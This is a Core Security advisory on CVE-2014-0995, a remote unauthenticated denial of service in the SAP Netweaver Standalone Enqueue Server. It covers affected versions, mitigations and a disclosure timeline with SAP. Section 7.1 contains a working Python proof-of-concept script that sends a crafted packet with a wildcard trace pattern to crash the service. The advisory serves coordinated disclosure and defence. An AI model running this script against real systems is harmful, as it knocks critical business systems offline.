SAP Netweaver Enqueue Server Trace Pattern Denial Of Service

`Core Security - Corelabs Advisory  
http://corelabs.coresecurity.com/  
  
SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability  
  
1. **Advisory Information**  
  
Title: SAP Netweaver Enqueue Server Trace Pattern Denial of Service  
Vulnerability  
Advisory ID: CORE-2014-0007  
Advisory URL:  
http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability  
Date published: 2014-10-15  
Date of last update: 2014-10-15  
Vendors contacted: SAP  
Release mode: Coordinated release  
  
2. **Vulnerability Information***  
*  
Class: Uncontrolled Recursion [CWE-674]  
Impact: Denial of service  
Remotely Exploitable: Yes  
Locally Exploitable: No  
CVE Name: CVE-2014-0995  
  
3. **Vulnerability Description**  
  
SAP Netweaver [1] is a technology platform for building and  
integrating SAP business  
applications. A vulnerability has been found in SAP Netweaver  
that could allow an  
unauthenticated, remote attacker to create denial of service  
conditions. The vulnerability  
is triggered by sending a specially crafted SAP Enqueue Server  
packet to remote TCP port 32NN  
(NN being the SAP system number) of a host running the  
"Standalone Enqueue Server" service, part  
of SAP Netweaver Application Server ABAP/Java. The "Standalone  
Enqueue Server" is a critical  
component of a SAP Netweaver installation in terms of  
availability, rendering the whole SAP  
system unresponsive.  
  
4. **Vulnerable Packages**  
  
. SAP Netweaver 7.01 (enserver.exe version v7010.32.15.63503).  
. SAP Netweaver 7.20 (enserver.exe version v7200.70.18.23869).  
  
Other versions are probably affected too, but they were not checked.  
  
5. **Vendor Information, Solutions and Workarounds**  
  
Martin Gallo proposed the following actions to mitigate the  
impact of the vulnerabilities:  
  
Restrict access to the Standalone Enqueue service by configuring  
Access Control Lists [4] and to  
the Standalone Enqueue Service TCP port 32XX (XX is the instance  
number).  
  
SAP published a security note [3] with the fix.  
  
6. **Credits**  
  
This vulnerability was discovered and researched by Martin Gallo  
from Core Security Consulting  
Services. The publication of this advisory was coordinated by  
Joaquín Rodríguez Varela from Core  
Advisories Team.  
  
7. **Technical Description / Proof of Concept Code**  
  
When the trace level of the service is configured to stop logging  
when a pattern is found [2], the  
service does not properly control the amount of recursion  
resulting in a stack overflow exception.  
The vulnerability can be triggered remotely by setting the trace  
level with a wildcard Trace Pattern.  
This vulnerability could allow a remote, unauthenticated attacker  
to conduct a denial of service  
attack against the vulnerable systems, rendering the Enqueue  
Server unavailable.  
  
The following python code can be used to trigger the vulnerability:  
  
7.1. **Proof of Concept**  
  
/-----  
import socket, struct  
from optparse import OptionParser  
  
# Parse the target options  
parser = OptionParser()  
parser.add_option("-d", "--hostname", dest="hostname", help="Hostname",  
default="localhost")  
parser.add_option("-p", "--port", dest="port", type="int", help="Port  
number", default=3200)  
(options, args) = parser.parse_args()  
  
def send_packet(sock, packet):  
packet = struct.pack("!I", len(packet)) + packet  
sock.send(packet)  
  
# Connect  
print "[*] Connecting to", options.hostname, "port", options.port  
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
connection.connect((options.hostname, options.port))  
  
print "[*] Sending crash packet"  
  
crash = '\xab\xcd\xe1\x23' # Magic bytes  
crash+= '\x00\x00\x00\x00' # Id  
crash+= '\x00\x00\x00\x5b\x00\x00\x00\x5b' # Packet/frag length  
crash+= '\x03\x00\x00\x00' # Destination/Opcode/MoreFrags/Type  
crash+= 'ENC\x00' # Admin Eye-catcher  
crash+= '\x01\x00\x00\x00' # Version  
crash+= '#EAA' # Admin Eye-catcher  
crash+= '\x01\x00\x00\x00\x00' # Len  
crash+= '\x06\x00\x00\x00\x00\x00' # Opcode/Flags/RC  
crash+= '#EAE' # Admin Eye-catcher  
crash+= '\x01\x04\x00\x00' # Version/Action/Limit/Tread  
crash+= '\x00\x00\x00\x00'  
crash+= '\x00\x00\x00\x03\x00\x00\x00\x03' # Trace Level  
crash+= '\x01' # Logging  
crash+= '\x01\x40\x00\x00' # Max file size  
crash+= '\x00\x00\x00\x01\x00\x00\x00\x01' # No. patterns  
crash+= '\x00\x00\x00\x25#EAH' # Trace Eye-catcher  
crash+= '\x01*\x00' # Trace Pattern  
crash+= '#EAD' # Trace Eye-catcher  
  
send_packet(connection, crash)  
print "[*] Crash sent !"  
-----/  
  
8. **Report Timeline**  
  
. 2014-06-02:  
  
Initial notification sent to SAP, including technical  
description to reproduce the  
vulnerability. Publication date set to Jun 30, 2014.   
  
. 2014-06-03:  
  
Vendor notifies that the tracking number 1153917-2014 was  
created for this issue.  
  
. 2014-06-26:  
  
Core Security requests SAP to inform the status of the advisory.  
  
. 2014-06-30:  
  
The vendor informs they were not able to reproduce the issue and  
they request additional  
details and a proof of concept.  
  
. 2014-06-30:  
  
Core Security sends SAP a full description of the vulnerability  
including a python script  
to trigger it.  
  
. 2014-07-11:  
  
Core Security asks if the vendor was able to trigger the  
vulnerability. Additinally we  
requested to set a publication date for the advisory based on  
the release of a fix.  
  
. 2014-07-14:  
  
The vendor informs they were able to reproduce the issue but  
they will not be able to provide  
a timeline for the fix at the time. They inform they will work  
with high priority on it and  
will inform us of the planned fix release date.  
  
. 2014-08-12:  
  
Core Security asks if the vendor was able to develop a fix and  
if they have a possible timeline  
for its availability.  
  
. 2014-08-13:  
  
The vendor informs that the fix is undergoing quality checks.  
They also inform that they can't  
provide an exact date of publication yet. They also request a 3  
months grace period once the  
patch is available.  
  
. 2014-08-13:  
  
Core Security informs SAP that after we get notice that the fix  
is available to the public we will  
publish the advisory accordingly and will not wait for the 3  
months of grace as requested because  
that's not our proceeding policy.  
  
. 2014-08-18:  
  
The vendor informs that the fix is going to be released with the  
October patch day, on Tuesday the  
14th, of 2014.  
  
. 2014-10-14:  
  
The vendor publishes the fix under the security note 2042845.  
  
. 2014-10-15:  
  
Core Security releases the advisory.  
  
9. **References**  
  
[1] http://www.sap.com/platform/netweaver/index.epx.  
[2]  
http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/e929ca3d7001cee10000000a421937/content.htm?frameset=/en/47/ea3ef600e83b8be10000000a421937/frameset.htm  
[3] SAP security note 2042845  
[4] https://websmp230.sap-ag.de/sap/support/notes/1495075.  
  
10. **About CoreLabs**  
  
CoreLabs, the research center of Core Security, is charged with  
anticipating  
the future needs and requirements for information security  
technologies.  
We conduct our research in several important areas of computer  
security  
including system vulnerabilities, cyber attack planning and  
simulation,  
source code auditing, and cryptography. Our results include problem  
formalization, identification of vulnerabilities, novel  
solutions and  
prototypes for new technologies. CoreLabs regularly publishes  
security  
advisories, technical papers, project information and shared  
software  
tools for public use at: http://corelabs.coresecurity.com.  
  
11. **About Core Security**  
  
Core Security enables organizations to get ahead of threats with  
security  
test and measurement solutions that continuously identify and  
demonstrate  
real-world exposures to their most critical assets. Our  
customers can  
gain real visibility into their security standing, real  
validation of  
their security controls, and real metrics to more effectively  
secure their  
organizations.  
  
Core Security's software solutions build on over a decade of trusted  
research and leading-edge threat expertise from the company's  
Security  
Consulting Services, CoreLabs and Engineering groups. Core Security  
can be reached at +1 (617) 399-6980 or on the Web at:  
http://www.coresecurity.com.  
  
12. **Disclaimer**  
  
The contents of this advisory are copyright (c) 2014 Core  
Security and (c) 2014 CoreLabs, and  
are licensed under a Creative Commons Attribution Non-Commercial  
Share-Alike 3.0 (United States) License:  
http://creativecommons.org/licenses/by-nc-sa/3.0/us/  
  
13. **PGP/GPG Keys**  
  
This advisory has been signed with the GPG key of Core Security  
advisories team, which is available for download at  
  
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.  
  
  
`